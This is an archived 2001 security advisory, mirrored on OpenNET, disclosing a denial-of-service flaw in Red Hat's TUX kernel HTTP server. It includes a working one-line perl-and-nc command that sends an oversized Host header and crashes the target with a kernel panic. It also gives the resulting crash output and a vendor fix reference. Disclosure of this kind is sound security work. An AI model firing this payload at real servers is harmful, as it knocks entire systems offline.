The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


RH Linux Tux HTTPD DoS


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Date: Mon, 5 Nov 2001 12:57:15 -0000
From: Aiden ORawe <[email protected]>
To: [email protected]
Subject: RH Linux Tux HTTPD DoS


TUX HTTPD Denial of Service Condition

Background: ------------- Tux is a Kernel-Space HTTP server coded for optimal performance (IRQ Affinity,HTTP compression, direct scatter-gather DMA etc.) It is meant to be used as the main HTTP server for static objects with requests for dynamic content being passed to a user-space HTTPD server such as Apache on same box when necessary. Tux is disabled by default. Vulnerability: -------------- It is possible to cause a denial of service condition by submitting an oversized "Host:" header request to the Tux daemon causing an assertion failure and eventual Kernel Panic. A total system reboot is required to return full functionality. For example the following script will cause the target box to crash: perl -e "print qq(GET / HTTP/1.0\nAccept: */*\nHost: ) . qq(A) x 6000 . qq(\n)" |nc <ip address> <dest_port> The following output will then generated (edited for brevity): Code: Bad EIP Value. (0)Kernel Panic: Aiee, killing interrupt handler! In interrupt handler - not syncing! To the best of my knowledge this is *not* a buffer overflow (despite apparently being able to overwrite the contents of the EIP register) and as such cannot be utilised to run arbitrary code. FYI The Tux source code contains numerous assertions that are used to safegaurd data integrity and if any of these assertions fail (as it does in this case) code execution is halted by making a call to the BUG() function. System(s) tested: ----------------- RedHat Linux 7.2 , Kernel 2.4.7-10 and 2.4.9-7 running TUX-2.1.0-2. Additional Notes: ----------------- [email protected] where advised of this issue 25 October 2001. Solution: --------- See Security Advisory - RHSA-2001:142-15 http://www.redhat.com/support/errata/RHSA-2001-142.html Thanks: ------- Michael K. Johnston


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру